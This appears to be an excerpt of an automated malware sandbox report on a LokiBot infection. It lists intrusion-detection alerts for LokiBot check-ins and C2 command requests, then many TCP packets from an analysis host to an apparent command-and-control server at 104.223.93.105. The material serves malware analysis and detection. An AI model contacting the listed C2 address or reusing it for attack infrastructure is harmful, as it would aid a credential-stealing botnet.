01/14/22-17:29:25.832127	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49828	80	192.168.2.5	104.223.93.105
01/14/22-17:29:25.832127	TCP	2025381	ET TROJAN LokiBot Checkin	49828	80	192.168.2.5	104.223.93.105
01/14/22-17:29:27.728216	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49830	80	192.168.2.5	104.223.93.105
01/14/22-17:29:27.728216	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49830	80	192.168.2.5	104.223.93.105
01/14/22-17:29:27.728216	TCP	2025381	ET TROJAN LokiBot Checkin	49830	80	192.168.2.5	104.223.93.105
01/14/22-17:29:30.416868	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49831	80	192.168.2.5	104.223.93.105
01/14/22-17:29:30.416868	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49831	80	192.168.2.5	104.223.93.105
01/14/22-17:29:30.416868	TCP	2025381	ET TROJAN LokiBot Checkin	49831	80	192.168.2.5	104.223.93.105
01/14/22-17:29:33.215695	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49832	80	192.168.2.5	104.223.93.105
01/14/22-17:29:33.215695	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49832	80	192.168.2.5	104.223.93.105
01/14/22-17:29:33.215695	TCP	2025381	ET TROJAN LokiBot Checkin	49832	80	192.168.2.5	104.223.93.105
01/14/22-17:29:34.891024	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49833	80	192.168.2.5	104.223.93.105
01/14/22-17:29:34.891024	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49833	80	192.168.2.5	104.223.93.105
01/14/22-17:29:34.891024	TCP	2025381	ET TROJAN LokiBot Checkin	49833	80	192.168.2.5	104.223.93.105
01/14/22-17:29:36.420886	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49834	80	192.168.2.5	104.223.93.105
01/14/22-17:29:36.420886	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49834	80	192.168.2.5	104.223.93.105
01/14/22-17:29:36.420886	TCP	2025381	ET TROJAN LokiBot Checkin	49834	80	192.168.2.5	104.223.93.105
01/14/22-17:29:37.798759	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49835	80	192.168.2.5	104.223.93.105
01/14/22-17:29:37.798759	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49835	80	192.168.2.5	104.223.93.105
01/14/22-17:29:37.798759	TCP	2025381	ET TROJAN LokiBot Checkin	49835	80	192.168.2.5	104.223.93.105
01/14/22-17:29:39.184764	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49836	80	192.168.2.5	104.223.93.105
01/14/22-17:29:39.184764	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49836	80	192.168.2.5	104.223.93.105
01/14/22-17:29:39.184764	TCP	2025381	ET TROJAN LokiBot Checkin	49836	80	192.168.2.5	104.223.93.105
01/14/22-17:29:40.528047	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49837	80	192.168.2.5	104.223.93.105
01/14/22-17:29:40.528047	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49837	80	192.168.2.5	104.223.93.105
01/14/22-17:29:40.528047	TCP	2025381	ET TROJAN LokiBot Checkin	49837	80	192.168.2.5	104.223.93.105
01/14/22-17:29:41.926430	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49838	80	192.168.2.5	104.223.93.105
01/14/22-17:29:41.926430	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49838	80	192.168.2.5	104.223.93.105
01/14/22-17:29:41.926430	TCP	2025381	ET TROJAN LokiBot Checkin	49838	80	192.168.2.5	104.223.93.105
01/14/22-17:29:43.436919	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49839	80	192.168.2.5	104.223.93.105
01/14/22-17:29:43.436919	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49839	80	192.168.2.5	104.223.93.105
01/14/22-17:29:43.436919	TCP	2025381	ET TROJAN LokiBot Checkin	49839	80	192.168.2.5	104.223.93.105
01/14/22-17:29:44.869754	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49840	80	192.168.2.5	104.223.93.105
01/14/22-17:29:44.869754	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49840	80	192.168.2.5	104.223.93.105
01/14/22-17:29:44.869754	TCP	2025381	ET TROJAN LokiBot Checkin	49840	80	192.168.2.5	104.223.93.105
01/14/22-17:29:46.912808	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49841	80	192.168.2.5	104.223.93.105
01/14/22-17:29:46.912808	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49841	80	192.168.2.5	104.223.93.105
01/14/22-17:29:46.912808	TCP	2025381	ET TROJAN LokiBot Checkin	49841	80	192.168.2.5	104.223.93.105
01/14/22-17:29:51.162188	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49843	80	192.168.2.5	104.223.93.105
01/14/22-17:29:51.162188	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49843	80	192.168.2.5	104.223.93.105
01/14/22-17:29:51.162188	TCP	2025381	ET TROJAN LokiBot Checkin	49843	80	192.168.2.5	104.223.93.105
01/14/22-17:29:53.715308	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49844	80	192.168.2.5	104.223.93.105
01/14/22-17:29:53.715308	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49844	80	192.168.2.5	104.223.93.105
01/14/22-17:29:53.715308	TCP	2025381	ET TROJAN LokiBot Checkin	49844	80	192.168.2.5	104.223.93.105
01/14/22-17:29:55.732334	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49845	80	192.168.2.5	104.223.93.105
01/14/22-17:29:55.732334	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49845	80	192.168.2.5	104.223.93.105
01/14/22-17:29:55.732334	TCP	2025381	ET TROJAN LokiBot Checkin	49845	80	192.168.2.5	104.223.93.105
01/14/22-17:29:57.571676	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49848	80	192.168.2.5	104.223.93.105
01/14/22-17:29:57.571676	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49848	80	192.168.2.5	104.223.93.105
01/14/22-17:29:57.571676	TCP	2025381	ET TROJAN LokiBot Checkin	49848	80	192.168.2.5	104.223.93.105
01/14/22-17:30:00.627163	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49850	80	192.168.2.5	104.223.93.105
01/14/22-17:30:00.627163	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49850	80	192.168.2.5	104.223.93.105
01/14/22-17:30:00.627163	TCP	2025381	ET TROJAN LokiBot Checkin	49850	80	192.168.2.5	104.223.93.105
01/14/22-17:30:02.041046	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49851	80	192.168.2.5	104.223.93.105
01/14/22-17:30:02.041046	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49851	80	192.168.2.5	104.223.93.105
01/14/22-17:30:02.041046	TCP	2025381	ET TROJAN LokiBot Checkin	49851	80	192.168.2.5	104.223.93.105
01/14/22-17:30:03.405898	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49852	80	192.168.2.5	104.223.93.105
01/14/22-17:30:03.405898	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49852	80	192.168.2.5	104.223.93.105
01/14/22-17:30:03.405898	TCP	2025381	ET TROJAN LokiBot Checkin	49852	80	192.168.2.5	104.223.93.105
01/14/22-17:30:04.852682	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49853	80	192.168.2.5	104.223.93.105
01/14/22-17:30:04.852682	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49853	80	192.168.2.5	104.223.93.105
01/14/22-17:30:04.852682	TCP	2025381	ET TROJAN LokiBot Checkin	49853	80	192.168.2.5	104.223.93.105
01/14/22-17:30:06.441232	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49854	80	192.168.2.5	104.223.93.105
01/14/22-17:30:06.441232	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49854	80	192.168.2.5	104.223.93.105
01/14/22-17:30:06.441232	TCP	2025381	ET TROJAN LokiBot Checkin	49854	80	192.168.2.5	104.223.93.105
01/14/22-17:30:08.079184	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49855	80	192.168.2.5	104.223.93.105
01/14/22-17:30:08.079184	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49855	80	192.168.2.5	104.223.93.105
01/14/22-17:30:08.079184	TCP	2025381	ET TROJAN LokiBot Checkin	49855	80	192.168.2.5	104.223.93.105
01/14/22-17:30:10.025451	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49856	80	192.168.2.5	104.223.93.105
01/14/22-17:30:10.025451	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49856	80	192.168.2.5	104.223.93.105
01/14/22-17:30:10.025451	TCP	2025381	ET TROJAN LokiBot Checkin	49856	80	192.168.2.5	104.223.93.105

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 17:28:13.127573013 CET	49754	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:13.312362909 CET	80	49754	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:13.312468052 CET	49754	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:13.315745115 CET	49754	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:13.446369886 CET	80	49754	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:13.446605921 CET	49754	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:13.579961061 CET	80	49754	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:13.586972952 CET	80	49754	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:13.587043047 CET	80	49754	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:13.587162971 CET	49754	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:13.587328911 CET	49754	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:13.716434002 CET	80	49754	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:14.832711935 CET	49755	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:14.963875055 CET	80	49755	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:14.964056015 CET	49755	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:14.966907978 CET	49755	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:15.097893000 CET	80	49755	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:15.098073006 CET	49755	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:15.229207039 CET	80	49755	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:15.236922026 CET	80	49755	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:15.236974001 CET	80	49755	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:15.237075090 CET	49755	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:15.237221956 CET	49755	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:15.368714094 CET	80	49755	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:16.468199968 CET	49757	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:16.599865913 CET	80	49757	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:16.599967003 CET	49757	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:16.603027105 CET	49757	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:16.734165907 CET	80	49757	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:16.734231949 CET	49757	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:16.865334034 CET	80	49757	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:16.872795105 CET	80	49757	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:16.872894049 CET	80	49757	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:16.872925997 CET	49757	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:16.872937918 CET	49757	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:17.004089117 CET	80	49757	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:18.786120892 CET	49761	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:18.946105957 CET	80	49761	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:18.946300030 CET	49761	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:18.954071045 CET	49761	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:19.083564043 CET	80	49761	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:19.083688021 CET	49761	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:19.213036060 CET	80	49761	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:19.221434116 CET	80	49761	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:19.221496105 CET	80	49761	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:19.221610069 CET	49761	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:19.221667051 CET	49761	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:19.369648933 CET	80	49761	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:21.083108902 CET	49762	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:21.213958979 CET	80	49762	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:21.214113951 CET	49762	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:21.450628042 CET	49762	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:21.580496073 CET	80	49762	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:21.580569983 CET	49762	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:21.710346937 CET	80	49762	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:21.723001003 CET	80	49762	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:21.723030090 CET	80	49762	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:21.723149061 CET	49762	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:21.932380915 CET	49762	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:22.062105894 CET	80	49762	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:23.124599934 CET	49763	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:23.255527973 CET	80	49763	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:23.255724907 CET	49763	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:23.258656025 CET	49763	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:23.389377117 CET	80	49763	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:23.389926910 CET	49763	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:23.521075010 CET	80	49763	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:23.530498028 CET	80	49763	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:23.530517101 CET	80	49763	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:23.530709982 CET	49763	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:23.530833960 CET	49763	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:23.662244081 CET	80	49763	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:24.607203960 CET	49764	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:24.747642994 CET	80	49764	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:24.747761011 CET	49764	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:24.754729986 CET	49764	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:24.882570982 CET	80	49764	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:24.882812977 CET	49764	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:25.010787964 CET	80	49764	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:25.029998064 CET	80	49764	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:25.030052900 CET	80	49764	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:25.030206919 CET	49764	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:25.031017065 CET	49764	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:25.172168970 CET	80	49764	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:25.957454920 CET	49765	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:26.088448048 CET	80	49765	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:26.092111111 CET	49765	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:26.095199108 CET	49765	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:26.226052999 CET	80	49765	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:26.226634026 CET	49765	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:26.357539892 CET	80	49765	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:26.366882086 CET	80	49765	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:26.366926908 CET	80	49765	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:26.367008924 CET	49765	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:26.367063999 CET	49765	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:26.498384953 CET	80	49765	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:27.686556101 CET	49766	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:27.818377018 CET	80	49766	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:27.818569899 CET	49766	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:27.825342894 CET	49766	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:27.956516981 CET	80	49766	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:27.956700087 CET	49766	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:28.087883949 CET	80	49766	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:28.095748901 CET	80	49766	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:28.095788956 CET	80	49766	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:28.095879078 CET	49766	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:28.095926046 CET	49766	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:28.227577925 CET	80	49766	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:29.128317118 CET	49767	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:29.257941961 CET	80	49767	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:29.258078098 CET	49767	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:29.267836094 CET	49767	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:29.398068905 CET	80	49767	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:29.398169041 CET	49767	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:29.528426886 CET	80	49767	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:29.534789085 CET	80	49767	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:29.534826040 CET	80	49767	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:29.534970045 CET	49767	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:29.535058975 CET	49767	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:29.665158033 CET	80	49767	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:30.459661961 CET	49768	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:30.590562105 CET	80	49768	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:30.590693951 CET	49768	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:30.598054886 CET	49768	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:30.729619026 CET	80	49768	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:30.729804993 CET	49768	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:30.862215996 CET	80	49768	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:30.869498968 CET	80	49768	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:30.869611025 CET	80	49768	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:30.869617939 CET	49768	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:30.869656086 CET	49768	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:31.002516985 CET	80	49768	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:31.828584909 CET	49769	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:31.989689112 CET	80	49769	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:31.990731001 CET	49769	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:31.998392105 CET	49769	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:32.126502037 CET	80	49769	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:32.126750946 CET	49769	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:32.333718061 CET	80	49769	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:32.371730089 CET	80	49769	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:32.371753931 CET	80	49769	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:32.371829987 CET	49769	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:32.372024059 CET	49769	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:32.502043962 CET	80	49769	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:35.073112965 CET	49772	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:35.245409012 CET	80	49772	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:35.246406078 CET	49772	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:35.257565022 CET	49772	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:35.388725996 CET	80	49772	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:35.388864040 CET	49772	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:35.556468964 CET	80	49772	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:35.598879099 CET	80	49772	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:35.598925114 CET	80	49772	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:35.599009991 CET	49772	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:35.599092960 CET	49772	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:35.737840891 CET	80	49772	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:37.549031973 CET	49773	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:37.680258989 CET	80	49773	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:37.680428028 CET	49773	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:37.734698057 CET	49773	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:37.887053013 CET	80	49773	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:37.887132883 CET	49773	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:38.018210888 CET	80	49773	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:38.027388096 CET	80	49773	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:38.027532101 CET	49773	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:38.027653933 CET	80	49773	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:38.027867079 CET	49773	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:38.159147978 CET	80	49773	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:40.898469925 CET	49774	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:43.901073933 CET	49774	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:44.066476107 CET	80	49774	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:44.066651106 CET	49774	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:44.091710091 CET	49774	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:44.222840071 CET	80	49774	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:44.225761890 CET	49774	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:44.357975006 CET	80	49774	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:44.368436098 CET	80	49774	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:44.368874073 CET	80	49774	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:44.368998051 CET	49774	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:44.369070053 CET	49774	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:44.500535011 CET	80	49774	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:45.533834934 CET	49775	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:45.664894104 CET	80	49775	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:45.665002108 CET	49775	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:45.667839050 CET	49775	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:45.798810959 CET	80	49775	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:45.798913002 CET	49775	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:46.151256084 CET	49775	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:46.282247066 CET	80	49775	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:46.295262098 CET	80	49775	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:46.295341015 CET	80	49775	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:46.295485973 CET	49775	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:46.295536995 CET	49775	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:46.427148104 CET	80	49775	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:47.251642942 CET	49776	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:47.380161047 CET	80	49776	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:47.381987095 CET	49776	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:47.384706974 CET	49776	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:47.514822006 CET	80	49776	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:47.514906883 CET	49776	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:47.643086910 CET	80	49776	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:47.653799057 CET	80	49776	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:47.653892040 CET	80	49776	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:47.653954983 CET	49776	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:47.655205011 CET	49776	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:47.782355070 CET	80	49776	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:48.812675953 CET	49777	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:48.944943905 CET	80	49777	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:48.945048094 CET	49777	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:48.947782993 CET	49777	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:49.082179070 CET	80	49777	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:49.085401058 CET	49777	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:49.217022896 CET	80	49777	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:49.225759983 CET	80	49777	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:49.225908041 CET	49777	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:49.226149082 CET	80	49777	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:49.226227999 CET	49777	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:49.357409000 CET	80	49777	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:50.670454025 CET	49778	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:50.798480034 CET	80	49778	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:50.798644066 CET	49778	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:50.801698923 CET	49778	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:50.978573084 CET	80	49778	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:50.978789091 CET	49778	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:51.107304096 CET	80	49778	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:51.116813898 CET	80	49778	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:51.116847992 CET	80	49778	104.223.93.105	192.168.2.5
Jan 14, 2022 17:28:51.117145061 CET	49778	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:51.117199898 CET	49778	80	192.168.2.5	104.223.93.105
Jan 14, 2022 17:28:51.245961905 CET	80	49778	104.223.93.105	192.168.2.5
